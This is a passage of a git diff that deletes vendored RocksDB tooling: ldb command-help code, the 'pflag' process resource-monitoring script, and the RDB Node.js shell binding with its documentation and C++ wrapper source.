-             " : Try to load option file from DB.\n");
-  ret.append("  --" + LDBCommand::ARG_IGNORE_UNKNOWN_OPTIONS +
-             " : Ignore unknown options when loading option file.\n");
-  ret.append("  --" + LDBCommand::ARG_BLOOM_BITS + "=<int,e.g.:14>\n");
-  ret.append("  --" + LDBCommand::ARG_FIX_PREFIX_LEN + "=<int,e.g.:14>\n");
-  ret.append("  --" + LDBCommand::ARG_COMPRESSION_TYPE +
-             "=<no|snappy|zlib|bzip2|lz4|lz4hc|xpress|zstd>\n");
-  ret.append("  --" + LDBCommand::ARG_COMPRESSION_MAX_DICT_BYTES +
-             "=<int,e.g.:16384>\n");
-  ret.append("  --" + LDBCommand::ARG_BLOCK_SIZE + "=<block_size_in_bytes>\n");
-  ret.append("  --" + LDBCommand::ARG_AUTO_COMPACTION + "=<true|false>\n");
-  ret.append("  --" + LDBCommand::ARG_DB_WRITE_BUFFER_SIZE +
-             "=<int,e.g.:16777216>\n");
-  ret.append("  --" + LDBCommand::ARG_WRITE_BUFFER_SIZE +
-             "=<int,e.g.:4194304>\n");
-  ret.append("  --" + LDBCommand::ARG_FILE_SIZE + "=<int,e.g.:2097152>\n");
-
-  ret.append("\n\n");
-  ret.append("Data Access Commands:\n");
-  PutCommand::Help(ret);
-  GetCommand::Help(ret);
-  BatchPutCommand::Help(ret);
-  ScanCommand::Help(ret);
-  DeleteCommand::Help(ret);
-  DeleteRangeCommand::Help(ret);
-  DBQuerierCommand::Help(ret);
-  ApproxSizeCommand::Help(ret);
-  CheckConsistencyCommand::Help(ret);
-
-  ret.append("\n\n");
-  ret.append("Admin Commands:\n");
-  WALDumperCommand::Help(ret);
-  CompactorCommand::Help(ret);
-  ReduceDBLevelsCommand::Help(ret);
-  ChangeCompactionStyleCommand::Help(ret);
-  DBDumperCommand::Help(ret);
-  DBLoaderCommand::Help(ret);
-  ManifestDumpCommand::Help(ret);
-  ListColumnFamiliesCommand::Help(ret);
-  DBFileDumperCommand::Help(ret);
-  InternalDumpCommand::Help(ret);
-  RepairCommand::Help(ret);
-  BackupCommand::Help(ret);
-  RestoreCommand::Help(ret);
-  CheckPointCommand::Help(ret);
-
-  fprintf(stderr, "%s\n", ret.c_str());
-}
-
-void LDBCommandRunner::RunCommand(
-    int argc, char** argv, Options options, const LDBOptions& ldb_options,
-    const std::vector<ColumnFamilyDescriptor>* column_families) {
-  if (argc <= 2) {
-    PrintHelp(ldb_options, argv[0]);
-    exit(1);
-  }
-
-  LDBCommand* cmdObj = LDBCommand::InitFromCmdLineArgs(
-      argc, argv, options, ldb_options, column_families);
-  if (cmdObj == nullptr) {
-    fprintf(stderr, "Unknown command\n");
-    PrintHelp(ldb_options, argv[0]);
-    exit(1);
-  }
-
-  if (!cmdObj->ValidateCmdLineOptions()) {
-    exit(1);
-  }
-
-  cmdObj->Run();
-  LDBCommandExecuteResult ret = cmdObj->GetExecuteState();
-  fprintf(stderr, "%s\n", ret.ToString().c_str());
-  delete cmdObj;
-
-  exit(ret.IsFailed());
-}
-
-void LDBTool::Run(int argc, char** argv, Options options,
-                  const LDBOptions& ldb_options,
-                  const std::vector<ColumnFamilyDescriptor>* column_families) {
-  LDBCommandRunner::RunCommand(argc, argv, options, ldb_options,
-                               column_families);
-}
-} // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/pflag b/thirdparty/rocksdb/tools/pflag
deleted file mode 100755
index f3394a6..0000000
--- a/thirdparty/rocksdb/tools/pflag
+++ /dev/null
@@ -1,217 +0,0 @@
-#!/usr/bin/env bash
-#
-#(c) 2004-present, Facebook, all rights reserved. 
-# See the LICENSE file for usage and distribution rights.
-#
-
-trap 'echo "Caught exception, dying"; exit' 1 2 3 15
-
-ME=`basename $0`
-SERVER=`hostname`
-
-#parameters used
-#
-Dump_Config=0
-DEBUG=
-OS=`/bin/uname -s`
-VMEM=
-RSS=
-CPU=
-VERBOSE=
-VAR=
-LIMIT=
-ACTION=
-N=
-WAIT=
-
-#
-#supported OS: Linux only for now. Easy to add
-#
-oscheck() {
-  case ${OS} in
-    Linux)
-     VMEM=vsz
-     RSS=rss
-     CPU=bsdtime
-     ;;
-    *)
-      die "Unsupported OS ${OS}. Send a bug report with OS you need supported. Thanks."
-      ;;
-  esac
-}
-
-
-verbose() {
-  if [ "x$DEBUG" != "x" ]; then
-    echo "$@" >&2
-  fi
-}
-
-warn() {
-  echo "$@" >&2
-}
-
-die() {
-    echo "ERROR: " "$@" >&2;
-    exit;
-}
-
-dump_config() {
-  cat <<EOCONFIG;
-$ME running on ${HOSTNAME} at `date`
-
-Configuration for this run:
-  PID to monitor     : ${PID}
-  Resource monitored : ${VAR}
-  Resource limit     : ${LIMIT}
-  Check every        : ${WAIT} seconds
-  No. of times run   : ${N}
-  What to do         : ${ACTION}
-EOCONFIG
-
-}
-
-usage() {
-  cat <<USAGE; exit
-$@
-
-Usage ${ME} -p pid [-x {VMEM|RSS|CPU}] -l limit [-a {warn|die|kill}] [-n cycles] [-w wait]
-
-Monitor a process for set of violations. Options:
-
-  -p: PID of process to monitor
-
-  -x: metric to sense. Currently only VMEM/RSS/CPU are supported. Defaults to VMEM
-
-  -l: what is the threshold/limit for the metric that is being sensed.
-    Examples: "-l 100m", "-l 1.5g" (for VMEM/RSS), "-l 5:04" 5:04 in BSDTIME for CPU
-    NOTE: defaults to 1GB
-
-  -a: action. Currently {warn|die|kill} are supported. 
-    The default action is to 'warn'. Here is the behavior:
-
-    warn: complain if usage exceeds threshold, but continue monitoring
-    kill: complain, kill the db_bench process and exit
-    die:  if usage exceeds threshold, die immediately
-
-  -n: number of cycles to monitor. Default is to monitor until PID no longer exists.
-
-  -w: wait time per cycle of monitoring. Default is 5 seconds.
-
-  -v: verbose messaging
-
-USAGE
-
-}
-
-#set default values if none given
-set_defaults_if_noopt_given() {
-
-  : ${VAR:=vsz}
-  : ${LIMIT:=1024000}
-  : ${WAIT:=5}
-  : ${N:=999999}
-  : ${ACTION:=warn}
-}
-
-validate_options() {
-  if [ "x$PID" = "x" -a $Dump_Config -ne 1 ]; then
-    usage "PID is mandatory"
-  fi
-}
-
-###### START
-
-
-  while getopts ":p:x:l:a:n:t:vhd" opt; do
-    case $opt in
-      d)
-          Dump_Config=1
-          ;;
-      h)
-          usage;
-          ;;
-      a)
-        ACTION=${OPTARG};
-        ;;
-      v)
-        DEBUG=1;
-        ;;
-      p)
-        PID=$OPTARG;
-        ;;
-      x)
-        VAR=$OPTARG;
-        ;;
-      l)
-        LIMIT=$OPTARG;
-        ;;
-      w)
-        WAIT=$OPTARG;
-        ;;
-      n)
-        N=$OPTARG;
-        ;;
-      \?) 
-        usage;
-        ;;
-    esac
-  done
-
-oscheck;
-set_defaults_if_noopt_given;
-validate_options;
-
-if [ $Dump_Config -eq 1 ]; then
-    dump_config;
-    exit;
-fi
-
-Done=0
-
-verbose "Trying ${N} times, Waiting ${WAIT} seconds each iteration";
-
-while [ $Done -eq 0 ]; do
-  VAL=`/bin/ps h -p $PID -o ${VAR} | perl -pe 'chomp; s/(.*)m/$1 * 1024/e; s/(.*)g/$1 * 1024 * 1024/e;'`
-  if [ ${VAL:=0} -eq 0 ]; then
-    warn "Process $PID ended without incident."
-    Done=1;
-    break;
-  fi
-
-  if [ $VAL -ge $LIMIT ]; then
-    Done=1;
-  else
-    echo "Value of '${VAR}' (${VAL}) is less than ${LIMIT} for PID ${PID}"
-    sleep $WAIT;
-  fi
-  if [ $Done -eq 1 ]; then
-
-    if [ "$ACTION" = "kill" ]; then
-        kill ${PID} || kill -3 ${PID}
-        exit;
-
-    elif [ "$ACTION" = "warn" ]; then
-
-      # go back to monitoring.
-
-      warn "`date` WARNING: ${VAR} breached threshold ${LIMIT}, actual is ${VAL}"
-      Done=0  #go back to monitoring
-
-    elif [ "$ACTION" = "die" ]; then
-      warn "WARNING: dying without killing process ${PID} on ${SERVER}"
-      warn "The process details are below: "
-      warn "`ps -p ${PID} -o pid,ppid,bsdtime,rss,vsz,cmd,args`"
-      warn ""
-
-      #should we send email/notify someone? TODO... for now, bail.
-
-      exit -1;
-
-    fi
-  else
-      :
-      #warn "INFO: PID $PID, $VAR = $VAL, limit ($LIMIT) not exceeded";
-  fi
-done
-
diff --git a/thirdparty/rocksdb/tools/rdb/.gitignore b/thirdparty/rocksdb/tools/rdb/.gitignore
deleted file mode 100644
index 378eac2..0000000
--- a/thirdparty/rocksdb/tools/rdb/.gitignore
+++ /dev/null
@@ -1 +0,0 @@
-build
diff --git a/thirdparty/rocksdb/tools/rdb/API.md b/thirdparty/rocksdb/tools/rdb/API.md
deleted file mode 100644
index e9c2e59..0000000
--- a/thirdparty/rocksdb/tools/rdb/API.md
+++ /dev/null
@@ -1,178 +0,0 @@
-# JavaScript API
-
-## DBWrapper
-
-### Constructor
-
-    # Creates a new database wrapper object
-    RDB()
-
-### Open
-
-    # Open a new or existing RocksDB database.
-    #
-    # db_name         (string)   - Location of the database (inside the
-    #                              `/tmp` directory).
-    # column_families (string[]) - Names of additional column families
-    #                              beyond the default. If there are no other
-    #                              column families, this argument can be
-    #                              left off.
-    #
-    # Returns true if the database was opened successfully, or false otherwise
-    db_obj.(db_name, column_families = [])
-
-### Get
-
-    # Get the value of a given key.
-    #
-    # key           (string) - Which key to get the value of.
-    # column_family (string) - Which column family to check for the key.
-    #                          This argument can be left off for the default
-    #                          column family
-    #
-    # Returns the value (string) that is associated with the given key if
-    # one exists, or null otherwise.
-    db_obj.get(key, column_family = { default })
-
-### Put
-
-    # Associate a value with a key.
-    #
-    # key           (string) - Which key to associate the value with.
-    # value         (string) - The value to associate with the key.
-    # column_family (string) - Which column family to put the key-value pair
-    #                          in. This argument can be left off for the
-    #                          default column family.
-    #
-    # Returns true if the key-value pair was successfully stored in the
-    # database, or false otherwise.
-    db_obj.put(key, value, column_family = { default })
-
-### Delete
-
-    # Delete a value associated with a given key.
-    #
-    # key           (string) - Which key to delete the value of..
-    # column_family (string) - Which column family to check for the key.
-    #                          This argument can be left off for the default
-    #                          column family
-    #
-    # Returns true if an error occurred while trying to delete the key in
-    # the database, or false otherwise. Note that this is NOT the same as
-    # whether a value was deleted; in the case of a specified key not having
-    # a value, this will still return true. Use the `get` method prior to
-    # this method to check if a value existed before the call to `delete`.
-    db_obj.delete(key, column_family = { default })
-
-### Dump
-
-    # Print out all the key-value pairs in a given column family of the
-    # database.
-    #
-    # column_family (string) - Which column family to dump the pairs from.
-    #                          This argument can be left off for the default
-    #                          column family.
-    #
-    # Returns true if the keys were successfully read from the database, or
-    # false otherwise.
-    db_obj.dump(column_family = { default })
-
-### WriteBatch
-
-    # Execute an atomic batch of writes (i.e. puts and deletes) to the
-    # database.
-    #
-    # cf_batches (BatchObject[]; see below) - Put and Delete writes grouped
-    #                                         by column family to execute
-    #                                         atomically.
-    #
-    # Returns true if the argument array was well-formed and was
-    # successfully written to the database, or false otherwise.
-    db_obj.writeBatch(cf_batches)
-
-### CreateColumnFamily
-
-    # Create a new column family for the database.
-    #
-    # column_family_name (string) - Name of the new column family.
-    #
-    # Returns true if the new column family was successfully created, or
-    # false otherwise.
-    db_obj.createColumnFamily(column_family_name)
-
-### CompactRange
-
-    # Compact the underlying storage for a given range.
-    #
-    # In addition to the endpoints of the range, the method is overloaded to
-    # accept a non-default column family, a set of options, or both.
-    #
-    # begin (string)         - First key in the range to compact.
-    # end   (string)         - Last key in the range to compact.
-    # options (object)       - Contains a subset of the following key-value
-    #                          pairs:
-    #                            * 'target_level'   => int
-    #                            * 'target_path_id' => int
-    # column_family (string) - Which column family to compact the range in.
-    db_obj.compactRange(begin, end)
-    db_obj.compactRange(begin, end, options)
-    db_obj.compactRange(begin, end, column_family)
-    db_obj.compactRange(begin, end, options, column_family)
-
-
-
-### Close
-
-    # Close an a database and free the memory associated with it.
-    #
-    # Return null.
-    # db_obj.close()
-
-
-## BatchObject
-
-### Structure
-
-A BatchObject must have at least one of the following key-value pairs:
-
-* 'put' => Array of ['string1', 'string1'] pairs, each of which signifies that
-the key 'string1' should be associated with the value 'string2'
-* 'delete' => Array of strings, each of which is a key whose value should be
-deleted.
-
-The following key-value pair is optional:
-
-* 'column_family' => The name (string) of the column family to apply the
-changes to.
-
-### Examples
-
-    # Writes the key-value pairs 'firstname' => 'Saghm' and
-    # 'lastname' => 'Rossi' atomically to the database.
-    db_obj.writeBatch([
-        {
-            put: [ ['firstname', 'Saghm'], ['lastname', 'Rossi'] ]
-        }
-    ]);
-
-
-    # Deletes the values associated with 'firstname' and 'lastname' in
-    # the default column family and adds the key 'number_of_people' with
-    # with the value '2'. Additionally, adds the key-value pair
-    # 'name' => 'Saghm Rossi' to the column family 'user1' and the pair
-    # 'name' => 'Matt Blaze' to the column family 'user2'. All writes
-    # are done atomically.
-    db_obj.writeBatch([
-        {
-            put: [ ['number_of_people', '2'] ],
-            delete: ['firstname', 'lastname']
-        },
-        {
-            put: [ ['name', 'Saghm Rossi'] ],
-            column_family: 'user1'
-        },
-        {
-            put: [ ['name', Matt Blaze'] ],
-            column_family: 'user2'
-        }
-    ]);
diff --git a/thirdparty/rocksdb/tools/rdb/README.md b/thirdparty/rocksdb/tools/rdb/README.md
deleted file mode 100644
index f69b3f7..0000000
--- a/thirdparty/rocksdb/tools/rdb/README.md
+++ /dev/null
@@ -1,40 +0,0 @@
-# RDB - RocksDB Shell
-
-RDB is a NodeJS-based shell interface to RocksDB. It can also be used as a
-JavaScript binding for RocksDB within a Node application.
-
-## Setup/Compilation
-
-### Requirements
-
-* static RocksDB library (i.e. librocksdb.a)
-* libsnappy
-* node (tested onv0.10.33, no guarantees on anything else!)
-* node-gyp
-* python2 (for node-gyp; tested with 2.7.8)
-
-### Installation
-
-NOTE: If your default `python` binary is not a version of python2, add
-the arguments `--python /path/to/python2` to the `node-gyp` commands.
-
-1. Make sure you have the static library (i.e. "librocksdb.a") in the root
-directory of your rocksdb installation. If not, `cd` there and run
-`make static_lib`.
-
-2. Run `node-gyp configure` to generate the build.
-
-3. Run `node-gyp build` to compile RDB.
-
-## Usage
-
-### Running the shell
-
-Assuming everything compiled correctly, you can run the `rdb` executable
-located in the root of the `tools/rdb` directory to start the shell. The file is
-just a shell script that runs the node shell and loads the constructor for the
-RDB object into the top-level function `RDB`.
-
-### JavaScript API
-
-See `API.md` for how to use RocksDB from the shell.
diff --git a/thirdparty/rocksdb/tools/rdb/binding.gyp b/thirdparty/rocksdb/tools/rdb/binding.gyp
deleted file mode 100644
index 8914554..0000000
--- a/thirdparty/rocksdb/tools/rdb/binding.gyp
+++ /dev/null
@@ -1,25 +0,0 @@
-{
-    "targets": [
-        {
-            "target_name": "rdb",
-            "sources": [
-                "rdb.cc",
-                "db_wrapper.cc",
-                "db_wrapper.h"
-            ],
-            "cflags_cc!": [
-                "-fno-exceptions"
-            ],
-            "cflags_cc+": [
-                "-std=c++11",
-            ],
-            "include_dirs+": [
-                "../../include"
-            ],
-            "libraries": [
-                "../../../librocksdb.a",
-                "-lsnappy"
-            ],
-        }
-    ]
-}
diff --git a/thirdparty/rocksdb/tools/rdb/db_wrapper.cc b/thirdparty/rocksdb/tools/rdb/db_wrapper.cc
deleted file mode 100644
index 1ec9da1..0000000
--- a/thirdparty/rocksdb/tools/rdb/db_wrapper.cc
+++ /dev/null
@@ -1,525 +0,0 @@
-#include <iostream>
-#include <memory>
-#include <vector>
-#include <v8.h>
-#include <node.h>
-
-#include "db/_wrapper.h"
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-
-namespace {
-  void printWithBackSlashes(std::string str) {
-    for (std::string::size_type i = 0; i < str.size(); i++) {
-      if (str[i] == '\\' || str[i] == '"') {
-        std::cout << "\\";
-      }
-
-      std::cout << str[i];
-    }
-  }
-
-  bool has_key_for_array(Local<Object> obj, std::string key) {
-    return obj->Has(String::NewSymbol(key.c_str())) &&
-        obj->Get(String::NewSymbol(key.c_str()))->IsArray();
-  }
-}
-
-using namespace v8;
-
-
-Persistent<Function> DBWrapper::constructor;
-
-DBWrapper::DBWrapper() {
-  options_.IncreaseParallelism();
-  options_.OptimizeLevelStyleCompaction();
-  options_.disable_auto_compactions = true;
-  options_.create_if_missing = true;
-}
-
-DBWrapper::~DBWrapper() {
-  delete db_;
-}
-
-bool DBWrapper::HasFamilyNamed(std::string& name, DBWrapper* db) {
-  return db->columnFamilies_.find(name) != db->columnFamilies_.end();
-}
-
-
-void DBWrapper::Init(Handle<Object> exports) {
-  Local<FunctionTemplate> tpl = FunctionTemplate::New(New);
-  tpl->SetClassName(String::NewSymbol("DBWrapper"));
-  tpl->InstanceTemplate()->SetInternalFieldCount(8);
-  tpl->PrototypeTemplate()->Set(String::NewSymbol("open"),
-      FunctionTemplate::New(Open)->GetFunction());
-  tpl->PrototypeTemplate()->Set(String::NewSymbol("get"),
-      FunctionTemplate::New(Get)->GetFunction());
-  tpl->PrototypeTemplate()->Set(String::NewSymbol("put"),
-      FunctionTemplate::New(Put)->GetFunction());
-  tpl->PrototypeTemplate()->Set(String::NewSymbol("delete"),
-      FunctionTemplate::New(Delete)->GetFunction());
-  tpl->PrototypeTemplate()->Set(String::NewSymbol("dump"),
-      FunctionTemplate::New(Dump)->GetFunction());
-  tpl->PrototypeTemplate()->Set(String::NewSymbol("createColumnFamily"),
-      FunctionTemplate::New(CreateColumnFamily)->GetFunction());
-  tpl->PrototypeTemplate()->Set(String::NewSymbol("writeBatch"),
-      FunctionTemplate::New(WriteBatch)->GetFunction());
-  tpl->PrototypeTemplate()->Set(String::NewSymbol("compactRange"),
-      FunctionTemplate::New(CompactRange)->GetFunction());
-
-  constructor = Persistent<Function>::New(tpl->GetFunction());
-  exports->Set(String::NewSymbol("DBWrapper"), constructor);
-}
-
-Handle<Value> DBWrapper::Open(const Arguments& args) {
-  HandleScope scope;
-  DBWrapper* db_wrapper = ObjectWrap::Unwrap<DBWrapper>(args.This());
-
-  if (!(args[0]->IsString() &&
-       (args[1]->IsUndefined() || args[1]->IsArray()))) {
-    return scope.Close(Boolean::New(false));
-  }
-
-  std::string db_file = *v8::String::Utf8Value(args[0]->ToString());
-
-  std::vector<std::string> cfs = { rocksdb::kDefaultColumnFamilyName };
-
-  if (!args[1]->IsUndefined()) {
-    Handle<Array> array = Handle<Array>::Cast(args[1]);
-    for (uint i = 0; i < array->Length(); i++) {
-      if (!array->Get(i)->IsString()) {
-        return scope.Close(Boolean::New(false));
-      }
-
-      cfs.push_back(*v8::String::Utf8Value(array->Get(i)->ToString()));
-    }
-  }
-
-  if (cfs.size() == 1) {
-    db_wrapper->status_ = rocksdb::DB::Open(
-        db_wrapper->options_, db_file, &db_wrapper->db_);
-
-    return scope.Close(Boolean::New(db_wrapper->status_.ok()));
-  }
-
-  std::vector<rocksdb::ColumnFamilyDescriptor> families;
-
-  for (std::vector<int>::size_type i = 0; i < cfs.size(); i++) {
-    families.push_back(rocksdb::ColumnFamilyDescriptor(
-        cfs[i], rocksdb::ColumnFamilyOptions()));
-  }
-
-  std::vector<rocksdb::ColumnFamilyHandle*> handles;
-  db_wrapper->status_ = rocksdb::DB::Open(
-      db_wrapper->options_, db_file, families, &handles, &db_wrapper->db_);
-
-  if (!db_wrapper->status_.ok()) {
-    return scope.Close(Boolean::New(db_wrapper->status_.ok()));
-  }
-
-  for (std::vector<int>::size_type i = 0; i < handles.size(); i++) {
-    db_wrapper->columnFamilies_[cfs[i]] = handles[i];
-  }
-
-  return scope.Close(Boolean::New(true));
-}
-
-
-Handle<Value> DBWrapper::New(const Arguments& args) {
-  HandleScope scope;
-  Handle<Value> to_return;
-
-  if (args.IsConstructCall()) {
-    DBWrapper* db_wrapper = new DBWrapper();
-    db_wrapper->Wrap(args.This());
-
-    return args.This();
-  }
-
-  const int argc = 0;
-  Local<Value> argv[0] = {};
-
-  return scope.Close(constructor->NewInstance(argc, argv));
-}
-
-Handle<Value> DBWrapper::Get(const Arguments& args) {
-  HandleScope scope;
-
-  if (!(args[0]->IsString() &&
-        (args[1]->IsUndefined() || args[1]->IsString()))) {
-    return scope.Close(Null());
-  }
-
-  DBWrapper* db_wrapper = ObjectWrap::Unwrap<DBWrapper>(args.This());
-  std::string key       = *v8::String::Utf8Value(args[0]->ToString());
-  std::string cf        = *v8::String::Utf8Value(args[1]->ToString());
-  std::string value;
-
-  if (args[1]->IsUndefined()) {
-    db_wrapper->status_ = db_wrapper->db_->Get(
-        rocksdb::ReadOptions(), key, &value);
-  } else if (db_wrapper->HasFamilyNamed(cf, db_wrapper)) {
-    db_wrapper->status_ = db_wrapper->db_->Get(
-        rocksdb::ReadOptions(), db_wrapper->columnFamilies_[cf], key, &value);
-  } else {
-    return scope.Close(Null());
-  }
-
-  Handle<Value> v = db_wrapper->status_.ok() ?
-      String::NewSymbol(value.c_str()) : Null();
-
-  return scope.Close(v);
-}
-
-Handle<Value> DBWrapper::Put(const Arguments& args) {
-  HandleScope scope;
-
-  if (!(args[0]->IsString() && args[1]->IsString() &&
-       (args[2]->IsUndefined() || args[2]->IsString()))) {
-    return scope.Close(Boolean::New(false));
-  }
-
-  DBWrapper* db_wrapper = ObjectWrap::Unwrap<DBWrapper>(args.This());
-  std::string key       = *v8::String::Utf8Value(args[0]->ToString());
-  std::string value     = *v8::String::Utf8Value(args[1]->ToString());
-  std::string cf        = *v8::String::Utf8Value(args[2]->ToString());
-
-  if (args[2]->IsUndefined()) {
-    db_wrapper->status_  = db_wrapper->db_->Put(
-      rocksdb::WriteOptions(), key, value
-    );
-  } else if (db_wrapper->HasFamilyNamed(cf, db_wrapper)) {
-    db_wrapper->status_ = db_wrapper->db_->Put(
-      rocksdb::WriteOptions(),
-      db_wrapper->columnFamilies_[cf],
-      key,
-      value
-    );
-  } else {
-    return scope.Close(Boolean::New(false));
-  }
-
-
-  return scope.Close(Boolean::New(db_wrapper->status_.ok()));
-}
-
-Handle<Value> DBWrapper::Delete(const Arguments& args) {
-  HandleScope scope;
-
-  if (!args[0]->IsString()) {
-    return scope.Close(Boolean::New(false));
-  }
-
-  DBWrapper* db_wrapper = ObjectWrap::Unwrap<DBWrapper>(args.This());
-  std::string arg0      = *v8::String::Utf8Value(args[0]->ToString());
-  std::string arg1      = *v8::String::Utf8Value(args[1]->ToString());
-
-  if (args[1]->IsUndefined()) {
-    db_wrapper->status_ = db_wrapper->db_->Delete(
-        rocksdb::WriteOptions(), arg0);
-  } else {
-    if (!db_wrapper->HasFamilyNamed(arg1, db_wrapper)) {
-      return scope.Close(Boolean::New(false));
-    }
-    db_wrapper->status_ = db_wrapper->db_->Delete(
-        rocksdb::WriteOptions(), db_wrapper->columnFamilies_[arg1], arg0);
-  }
-
-  return scope.Close(Boolean::New(db_wrapper->status_.ok()));
-}
-
-Handle<Value> DBWrapper::Dump(const Arguments& args) {
-  HandleScope scope;
-  std::unique_ptr<rocksdb::Iterator> iterator;
-  DBWrapper* db_wrapper = ObjectWrap::Unwrap<DBWrapper>(args.This());
-  std::string arg0      = *v8::String::Utf8Value(args[0]->ToString());
-
-  if (args[0]->IsUndefined()) {
-    iterator.reset(db_wrapper->db_->NewIterator(rocksdb::ReadOptions()));
-  } else {
-    if (!db_wrapper->HasFamilyNamed(arg0, db_wrapper)) {
-      return scope.Close(Boolean::New(false));
-    }
-
-    iterator.reset(db_wrapper->db_->NewIterator(
-        rocksdb::ReadOptions(), db_wrapper->columnFamilies_[arg0]));
-  }
-
-  iterator->SeekToFirst();
-
-  while (iterator->Valid()) {
-    std::cout << "\"";
-    printWithBackSlashes(iterator->key().ToString());
-    std::cout << "\" => \"";
-    printWithBackSlashes(iterator->value().ToString());
-    std::cout << "\"\n";
-    iterator->Next();
-  }
-
-  return scope.Close(Boolean::New(true));
-}
-
-Handle<Value> DBWrapper::CreateColumnFamily(const Arguments& args) {
-  HandleScope scope;
-
-  if (!args[0]->IsString()) {
-    return scope.Close(Boolean::New(false));
-  }
-
-  DBWrapper* db_wrapper = ObjectWrap::Unwrap<DBWrapper>(args.This());
-  std::string cf_name   = *v8::String::Utf8Value(args[0]->ToString());
-
-  if (db_wrapper->HasFamilyNamed(cf_name, db_wrapper)) {
-    return scope.Close(Boolean::New(false));
-  }
-
-  rocksdb::ColumnFamilyHandle* cf;
-  db_wrapper->status_ = db_wrapper->db_->CreateColumnFamily(
-      rocksdb::ColumnFamilyOptions(), cf_name, &cf);
-
-  if (!db_wrapper->status_.ok()) {
-    return scope.Close(Boolean::New(false));
-  }
-
-  db_wrapper->columnFamilies_[cf_name] = cf;
-
-  return scope.Close(Boolean::New(true));
-}
-
-bool DBWrapper::AddToBatch(rocksdb::WriteBatch& batch, bool del,
-                           Handle<Array> array) {
-  Handle<Array> put_pair;
-  for (uint i = 0; i < array->Length(); i++) {
-    if (del) {
-      if (!array->Get(i)->IsString()) {
-        return false;
-      }
-
-      batch.Delete(*v8::String::Utf8Value(array->Get(i)->ToString()));
-      continue;
-    }
-
-    if (!array->Get(i)->IsArray()) {
-      return false;
-    }
-
-    put_pair = Handle<Array>::Cast(array->Get(i));
-
-    if (!put_pair->Get(0)->IsString() || !put_pair->Get(1)->IsString()) {
-      return false;
-    }
-
-    batch.Put(
-        *v8::String::Utf8Value(put_pair->Get(0)->ToString()),
-        *v8::String::Utf8Value(put_pair->Get(1)->ToString()));
-  }
-
-  return true;
-}
-
-bool DBWrapper::AddToBatch(rocksdb::WriteBatch& batch, bool del,
-                           Handle<Array> array, DBWrapper* db_wrapper,
-                           std::string cf) {
-  Handle<Array> put_pair;
-  for (uint i = 0; i < array->Length(); i++) {
-    if (del) {
-      if (!array->Get(i)->IsString()) {
-        return false;
-      }
-
-      batch.Delete(
-          db_wrapper->columnFamilies_[cf],
-          *v8::String::Utf8Value(array->Get(i)->ToString()));
-      continue;
-    }
-
-    if (!array->Get(i)->IsArray()) {
-      return false;
-    }
-
-    put_pair = Handle<Array>::Cast(array->Get(i));
-
-    if (!put_pair->Get(0)->IsString() || !put_pair->Get(1)->IsString()) {
-      return false;
-    }
-
-    batch.Put(
-        db_wrapper->columnFamilies_[cf],
-        *v8::String::Utf8Value(put_pair->Get(0)->ToString()),
-        *v8::String::Utf8Value(put_pair->Get(1)->ToString()));
-  }
-
-  return true;
-}
-
-Handle<Value> DBWrapper::WriteBatch(const Arguments& args) {
-  HandleScope scope;
-
-  if (!args[0]->IsArray()) {
-    return scope.Close(Boolean::New(false));
-  }
-
-  DBWrapper* db_wrapper     = ObjectWrap::Unwrap<DBWrapper>(args.This());
-  Handle<Array> sub_batches = Handle<Array>::Cast(args[0]);
-  Local<Object> sub_batch;
-  rocksdb::WriteBatch batch;
-  bool well_formed;
-
-  for (uint i = 0; i < sub_batches->Length(); i++) {
-    if (!sub_batches->Get(i)->IsObject()) {
-      return scope.Close(Boolean::New(false));
-    }
-    sub_batch = sub_batches->Get(i)->ToObject();
-
-    if (sub_batch->Has(String::NewSymbol("column_family"))) {
-      if (!has_key_for_array(sub_batch, "put") &&
-          !has_key_for_array(sub_batch, "delete")) {
-        return scope.Close(Boolean::New(false));
-      }
-
-      well_formed = db_wrapper->AddToBatch(
-        batch, false,
-        Handle<Array>::Cast(sub_batch->Get(String::NewSymbol("put"))),
-        db_wrapper, *v8::String::Utf8Value(sub_batch->Get(
-            String::NewSymbol("column_family"))));
-
-      well_formed = db_wrapper->AddToBatch(
-          batch, true,
-          Handle<Array>::Cast(sub_batch->Get(String::NewSymbol("delete"))),
-          db_wrapper, *v8::String::Utf8Value(sub_batch->Get(
-          String::NewSymbol("column_family"))));
-    } else {
-      well_formed = db_wrapper->AddToBatch(
-          batch, false,
-          Handle<Array>::Cast(sub_batch->Get(String::NewSymbol("put"))));
-      well_formed = db_wrapper->AddToBatch(
-          batch, true,
-          Handle<Array>::Cast(sub_batch->Get(String::NewSymbol("delete"))));
-
-      if (!well_formed) {
-        return scope.Close(Boolean::New(false));
-      }
-    }
-  }
-
-  db_wrapper->status_ = db_wrapper->db_->Write(rocksdb::WriteOptions(), &batch);
-
-  return scope.Close(Boolean::New(db_wrapper->status_.ok()));
-}
-
-Handle<Value> DBWrapper::CompactRangeDefault(const Arguments& args) {
-  HandleScope scope;
-
-  DBWrapper* db_wrapper = ObjectWrap::Unwrap<DBWrapper>(args.This());
-  rocksdb::Slice begin     = *v8::String::Utf8Value(args[0]->ToString());
-  rocksdb::Slice end       = *v8::String::Utf8Value(args[1]->ToString());
-  db_wrapper->status_    = db_wrapper->db_->CompactRange(&end, &begin);
-
-  return scope.Close(Boolean::New(db_wrapper->status_.ok()));
-}
-
-Handle<Value> DBWrapper::CompactColumnFamily(const Arguments& args) {
-  HandleScope scope;
-
-  DBWrapper* db_wrapper = ObjectWrap::Unwrap<DBWrapper>(args.This());
-  rocksdb::Slice begin  = *v8::String::Utf8Value(args[0]->ToString());
-  rocksdb::Slice end    = *v8::String::Utf8Value(args[1]->ToString());
-  std::string cf        = *v8::String::Utf8Value(args[2]->ToString());
-  db_wrapper->status_    = db_wrapper->db_->CompactRange(
-      db_wrapper->columnFamilies_[cf], &begin, &end);
-
-  return scope.Close(Boolean::New(db_wrapper->status_.ok()));
-}
-
-Handle<Value> DBWrapper::CompactOptions(const Arguments& args) {
-  HandleScope scope;
-
-  if (!args[2]->IsObject()) {
-    return scope.Close(Boolean::New(false));
-  }
-
-  DBWrapper* db_wrapper = ObjectWrap::Unwrap<DBWrapper>(args.This());
-  rocksdb::Slice begin     = *v8::String::Utf8Value(args[0]->ToString());
-  rocksdb::Slice end       = *v8::String::Utf8Value(args[1]->ToString());
-  Local<Object> options  = args[2]->ToObject();
-  int target_level = -1, target_path_id = 0;
-
-  if (options->Has(String::NewSymbol("target_level")) &&
-      options->Get(String::NewSymbol("target_level"))->IsInt32()) {
